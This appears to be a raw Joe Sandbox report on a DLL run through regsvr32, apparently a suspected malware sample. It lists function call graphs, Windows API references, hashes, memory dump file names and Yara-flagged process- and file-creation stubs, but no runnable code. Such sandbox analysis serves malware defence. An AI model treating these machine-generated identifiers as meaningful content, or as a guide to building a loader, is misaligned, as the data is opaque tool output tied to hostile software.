• String ID: $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5@bYp^kS3Cz_UL#l0$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@Wx$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~
• API String ID: 1838633152-1724951201
• Opcode ID: 2d7d73c37fecae8605df5aa6a796909f0842c0b95b3783c56ecd4b003069eb60
• Instruction ID: 37dd4164aa71e93fa7bce9b21c04c5e49dc1137560822f9b367f2b228996c10d
• Opcode Fuzzy Hash: 2d7d73c37fecae8605df5aa6a796909f0842c0b95b3783c56ecd4b003069eb60
• Instruction Fuzzy Hash: 68B3605250DBC5C8E332C23C64587CFAE8193A3319F484299D3E41AADBC7AE8159DF67
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
• String ID:
• API String ID: 2667261700-0
• Opcode ID: f0cd0788f1e665375fbd08d2c573a301f397109be629cd258b98b8b36acae790
• Instruction ID: 11f99c641814f6a2120a34323663aa093d5fcbf9f1caf6e7f45f7da9de1e93a0
• Opcode Fuzzy Hash: f0cd0788f1e665375fbd08d2c573a301f397109be629cd258b98b8b36acae790
• Instruction Fuzzy Hash: 3441B171601A4897EB5ACB25D5543EC7361FB4CBC2F01C425EB6A87B91DF38D669C300
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0000000180025710: HeapCreate.KERNELBASE(?,?,?,?,000000018001FFC9), ref: 0000000180025722
  • Part of subcall function 0000000180025710: HeapSetInformation.KERNEL32 ref: 000000018002574C
• _RTC_Initialize.LIBCMT ref: 000000018001FFE4
• GetCommandLineA.KERNEL32 ref: 000000018001FFE9
  • Part of subcall function 00000001800254EC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018001FFFB), ref: 000000018002551B
  • Part of subcall function 00000001800254EC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018001FFFB), ref: 000000018002555B
  • Part of subcall function 0000000180024D98: GetStartupInfoA.KERNEL32 ref: 0000000180024DBD
• __setargv.LIBCMT ref: 0000000180020012
• _cinit.LIBCMT ref: 0000000180020026
  • Part of subcall function 000000018002329C: FlsFree.KERNEL32(?,?,?,?,0000000180020077), ref: 00000001800232AB
  • Part of subcall function 000000018002329C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180020077), ref: 0000000180026E2E
  • Part of subcall function 000000018002329C: free.LIBCMT ref: 0000000180026E37
  • Part of subcall function 000000018002329C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180020077), ref: 0000000180026E57
  • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
• FlsSetValue.KERNEL32 ref: 00000001800200AC
• GetCurrentThreadId.KERNEL32 ref: 00000001800200C0
• free.LIBCMT ref: 00000001800200CF
  • Part of subcall function 0000000180020300: HeapFree.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020316
  • Part of subcall function 0000000180020300: _errno.LIBCMT ref: 0000000180020320
  • Part of subcall function 0000000180020300: GetLastError.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020328
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
• String ID:
• API String ID: 1549890855-0
• Opcode ID: 9530ca360e5a6c91f0025d551154d36cc27b1b30c2770dcf46c3c1223d65c3dd
• Instruction ID: d01bf37bb7470735549378ab2ef13b898c9f3bb6232b5f66a1b71ec66589f0ed
• Opcode Fuzzy Hash: 9530ca360e5a6c91f0025d551154d36cc27b1b30c2770dcf46c3c1223d65c3dd
• Instruction Fuzzy Hash: E1313830601B0D85FBE777B194863ED23955F5D3D6F20C929B855892C3EF68874D4325
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• _getptd.LIBCMT ref: 00000001800267DF
  • Part of subcall function 00000001800264B8: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00000001800267FA,?,?,?,?,?,00000001800269CF), ref: 00000001800264E2
  • Part of subcall function 0000000180024C20: malloc.LIBCMT ref: 0000000180024C3F
  • Part of subcall function 0000000180024C20: Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
• free.LIBCMT ref: 000000018002686B
  • Part of subcall function 0000000180020300: HeapFree.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020316
  • Part of subcall function 0000000180020300: _errno.LIBCMT ref: 0000000180020320
  • Part of subcall function 0000000180020300: GetLastError.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020328
• _lock.LIBCMT ref: 00000001800268A3
• free.LIBCMT ref: 0000000180026953
• free.LIBCMT ref: 0000000180026983
• _errno.LIBCMT ref: 0000000180026988
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
• String ID:
• API String ID: 2878544890-0
• Opcode ID: 89782bc3b0f656579708733da8eca1d2f93d827173c25c5431bf9a1dce3e192a
• Instruction ID: af0133700c0d7037df043fa7cabb32f1a7adc2f9dfda83af6934f9dbd9c693e3
• Opcode Fuzzy Hash: 89782bc3b0f656579708733da8eca1d2f93d827173c25c5431bf9a1dce3e192a
• Instruction Fuzzy Hash: A051C431A01A4886E7D39B2594403E9B7A5F78CBD9F64C216FA9E473A6CF38C649C710
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0000000180021220: _initp_misc_winsig.LIBCMT ref: 0000000180021259
  • Part of subcall function 0000000180021220: EncodePointer.KERNEL32(?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180021275
• FlsAlloc.KERNEL32(?,?,?,000000018001FFD9), ref: 00000001800235B3
  • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
• FlsSetValue.KERNEL32(?,?,?,000000018001FFD9), ref: 00000001800235E4
• GetCurrentThreadId.KERNEL32 ref: 00000001800235F8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 54287522-0
                                                                                                                                                                                    • Opcode ID: 9515a0eb0b270a471e54124f48ee9fd2a9b85e7ee230819a11b93a35135c4a17
                                                                                                                                                                                    • Instruction ID: ee33c46cb241b70e3529a392a1fe48f9641c492e465072bd93d6265023727f4f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9515a0eb0b270a471e54124f48ee9fd2a9b85e7ee230819a11b93a35135c4a17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01447070160D85FBD7AB75A84B3D92795AB4C7F1F14C324B8298A3E5EE28C78D8310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 545 13c9f3c-13ca0ed call 13d144c call 13b89d8 CreateProcessW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 013B1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_13b1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                    • String ID: c
                                                                                                                                                                                    • API String ID: 963392458-3834304328
                                                                                                                                                                                    • Opcode ID: 68d4fdec304cfb6f8408c3fc39729a7a02d307bdb47bd5c8b632913afc881074
                                                                                                                                                                                    • Instruction ID: 9eb008d486df9be2d441d43388f88af4a3625ce76682646eddf9c96a26be18eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d4fdec304cfb6f8408c3fc39729a7a02d307bdb47bd5c8b632913afc881074
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7341017051C7888FC7B4DF18D48979ABBE0FB88314F204A5EE48DC7255D774A984CB82
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 550 13cd79c-13cd8e4 call 13d144c call 13b89d8 CreateFileW
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 013B1000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_13b1000_regsvr32.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: v/p
                                                                                                                                                                                    • API String ID: 823142352-3978593441
                                                                                                                                                                                    • Opcode ID: a2f6b58c0a15b1ceae3d906796549a0a8e0fa143b468fe1e695d446d358e3396
                                                                                                                                                                                    • Instruction ID: 1d175d48e09d14620bd336a6896017d513adc8d3f706995f7e7b784a5e80d27e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2f6b58c0a15b1ceae3d906796549a0a8e0fa143b468fe1e695d446d358e3396
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5231057150C7858FC7A4DF18D08479ABBE4FB98314F104A6EE88DD7262DB749885CB87
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 555 18000a5b0-18000a5cf call 180004648 ExitProcess
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID: DllRegisterServer
                                                                                                                                                                                    • API String ID: 621844428-1663957109
                                                                                                                                                                                    • Opcode ID: a700413a3a8e58245474342b2b0fe4b447008f8ef2601ffac2d9f67b3abf513e
                                                                                                                                                                                    • Instruction ID: cbcbd52b9743a47eec6da177e7a4d62ed9e09553594e1acfcd2e3beff7085d7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a700413a3a8e58245474342b2b0fe4b447008f8ef2601ffac2d9f67b3abf513e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC04C7562180981D946B7A6EC933C91251A7C93C4F82E411A10D47211DE59C35A4755
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentThread$malloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4095733961-0
                                                                                                                                                                                    • Opcode ID: 54f3c3d4fd8aea113dedf15f5e682120a48575e6fc57a3863662f3ff08195810
                                                                                                                                                                                    • Instruction ID: 68b7d4e0b7a66878a15e4600796ddafaa63b368de66a1a843dd2a0487462e646
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54f3c3d4fd8aea113dedf15f5e682120a48575e6fc57a3863662f3ff08195810
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32310D32211B9881E7929F60E4403DD73E8F708FD4F59863AFA984BB99DF7485A6C350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _errno.LIBCMT ref: 00000001800283AF
                                                                                                                                                                                      • Part of subcall function 0000000180021830: DecodePointer.KERNEL32 ref: 0000000180021857
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,0000000180024CBF,?,?,?,00000001800233AB,?,?,00000018,0000000180020621), ref: 00000001800283F8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateDecodeHeapPointer_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 15861996-0
                                                                                                                                                                                    • Opcode ID: 67278d8a8f9952aaa92b90d529845bb27a2b67302801190aa784fc139e3d08f3
                                                                                                                                                                                    • Instruction ID: 58b95d6baf11004c05619311196addc2f5a07f3ea11cdeeaafa13d6bca7c6515
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67278d8a8f9952aaa92b90d529845bb27a2b67302801190aa784fc139e3d08f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C110A3931620886FBD79B20D6447EA63915F8CBD4F18C620BE1547AC5DF7887488300
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: AllocateBoundaryDeleteDescriptorHeap
• String ID:
• API String ID: 254689257-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _initp_misc_winsig.LIBCMT ref: 0000000180021259
  • Part of subcall function 0000000180024AB8: EncodePointer.KERNEL32(?,?,?,?,000000018002126E,?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180024AC3
• EncodePointer.KERNEL32(?,?,?,00000001800235A3,?,?,?,000000018001FFD9), ref: 0000000180021275
Similarity
• API ID: EncodePointer$_initp_misc_winsig
• String ID:
• API String ID: 190222155-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: Heap$CreateInformation
• String ID:
• API String ID: 1774340351-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• malloc.LIBCMT ref: 0000000180024C3F
  • Part of subcall function 0000000180020248: _FF_MSGBANNER.LIBCMT ref: 0000000180020278
  • Part of subcall function 0000000180020248: RtlAllocateHeap.NTDLL(?,?,00000018,000000018000B780), ref: 000000018002029D
  • Part of subcall function 0000000180020248: _errno.LIBCMT ref: 00000001800202C1
  • Part of subcall function 0000000180020248: _errno.LIBCMT ref: 00000001800202CC
• Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
Similarity
• API ID: _errno$AllocateHeapSleepmalloc
• String ID:
• API String ID: 4275769124-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• EncodePointer.KERNEL32(?,?,?,0000000180020FFB,?,?,?,000000018002002B), ref: 0000000180026FD9
Similarity
• API ID: EncodePointer
• String ID:
• API String ID: 2118026453-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
Similarity
• API ID: Sleep_errno
• String ID:
• API String ID: 1068366078-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Locale$ConvertDefault$_errno$Module$AddressHandleProc$EnumFileInfoLanguagesLibraryLoadNameResource_snwprintf_s
• String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$LOC$kernel32.dll$ntdll.dll
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: __doserrno_errno
• String ID: U
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
• String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
• GetStdHandle.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025BEF
• WriteFile.KERNEL32 ref: 0000000180025C29
Strings
Memory Dump Source
